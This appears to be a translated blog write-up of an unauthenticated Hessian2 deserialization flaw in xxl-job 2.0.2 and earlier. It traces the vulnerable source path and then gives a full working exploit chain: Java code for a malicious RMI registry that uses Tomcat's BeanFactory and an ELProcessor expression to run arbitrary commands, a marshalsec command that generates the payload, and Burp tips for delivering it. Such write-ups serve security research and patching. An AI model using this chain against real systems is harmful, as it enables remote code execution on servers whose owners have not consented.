xxl-job <=2.0.2 deserialization vulnerability

Setup

Download the 2.0.2 source from https://github.com/xuxueli/xxl-job/releases/tag/2.0.2, import it into IDEA, import the bundled SQL file into MySQL, adjust the database configuration, and run XxlJobAdminApplication; the project then starts.

Vulnerability analysis

In xxl-job-2.0.2/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobApiController.java the api endpoint is annotated @PermessionLimit(limit=false), so it can be reached without logging in:

    @RequestMapping(AdminBiz.MAPPING)
    @PermessionLimit(limit=false)
    public void api(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
        XxlJobDynamicScheduler.invokeAdminService(request, response);
    }
    

Follow invokeAdminService:

    public static void invokeAdminService(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
        servletServerHandler.handle(null, request, response);
    }
    

Follow handle; there, parseRequest processes the request body:

    private XxlRpcRequest parseRequest(HttpServletRequest request) throws Exception {
        // deserialize request
        byte[] requestBytes = readBytes(request);
        if (requestBytes == null || requestBytes.length==0) {
            throw new XxlRpcException("xxl-rpc request data is empty.");
        }
        XxlRpcRequest rpcXxlRpcRequest = (XxlRpcRequest) xxlRpcProviderFactory.getSerializer().deserialize(requestBytes, XxlRpcRequest.class);
        return rpcXxlRpcRequest;
    }
    

Here we can see a deserialization call, so follow deserialize.

deserialize is an abstract method, so which serializer implementation is used is decided where xxlRpcProviderFactory is configured, in

xxl-job-2.0.2/xxl-job-admin/src/main/java/com/xxl/job/admin/core/schedule/XxlJobDynamicScheduler.java

From that configuration, the deserialization above lands in the HessianSerializer class, i.e. it is a Hessian2 deserialization of a byte stream that is entirely attacker-controlled. Note that the access token (xxl.job.accessToken) does not protect this path: the token is a field of XxlRpcRequest and is checked in XxlRpcProviderFactory.invokeService, which runs only after parseRequest has already deserialized the payload.

Exploitation

Gadget on the target side: javax.el.ELProcessor, instantiated through Tomcat's org.apache.naming.factory.BeanFactory. Because the JNDI Reference names classes that are already on the target's classpath (xxl-job-admin runs on Spring Boot's embedded Tomcat, which ships javax.el), this works even on JDK builds where com.sun.jndi.rmi.object.trustURLCodebase is false and remote codebases are refused; see the first reference below.

Start a malicious RMI registry locally (Tomcat's catalina.jar, which provides org.apache.naming.*, must be on the classpath):

    package RMI;
    
    import com.sun.jndi.rmi.registry.*;
    import javax.naming.*;
    import org.apache.naming.ResourceRef;
    import java.rmi.registry.LocateRegistry;
    import java.rmi.registry.Registry;
    
    // Needs Tomcat's catalina.jar (org.apache.naming.*) on the classpath to compile and run.
    public class RmiTest {
        public static void main(String[] args) throws Exception {
            System.out.println("Creating evil RMI registry on port 1099");
            Registry registry = LocateRegistry.createRegistry(1099);
    
            // Reference to javax.el.ELProcessor, instantiated on the target by Tomcat's BeanFactory;
            // both classes already exist on the target's classpath, so no remote codebase is needed
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
            // forceString makes BeanFactory call ELProcessor.eval(String) for property 'x' instead of a setX setter,
            // see BeanFactory.getObjectInstance
            ref.add(new StringRefAddr("forceString", "x=eval"));
            // EL expression passed to eval(): reaches ProcessBuilder via ScriptEngineManager and starts mstsc.exe;
            // replace ['cmd','/c','mstsc.exe'] with ['/bin/sh','-c','...'] for a Linux target
            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','mstsc.exe']).start()\")"));
    
            // Bind under the name the payload will look up: rmi://127.0.0.1:1099/Object
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
            registry.bind("Object", referenceWrapper);
            System.out.println("Bound rmi://127.0.0.1:1099/Object; keep this process running while the payload is delivered");
        }
    }
    

Generate the PoC with marshalsec; the Hessian2 gadget SpringAbstractBeanFactoryPointcutAdvisor performs a JNDI lookup of the given URL during deserialization:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://127.0.0.1:1099/Object >hessian2.dat
    

• Note: when submitting the serialized data in Burp, set User options -> Display -> Character sets -> Display as raw bytes and restart Burp; otherwise Burp re-encodes non-ASCII bytes and the Hessian2 stream arrives corrupted.

References

    https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html

    https://www.cnblogs.com/tr1ple/p/12335098.html

Original article: https://www.cnblogs.com/depycode/p/14009910.html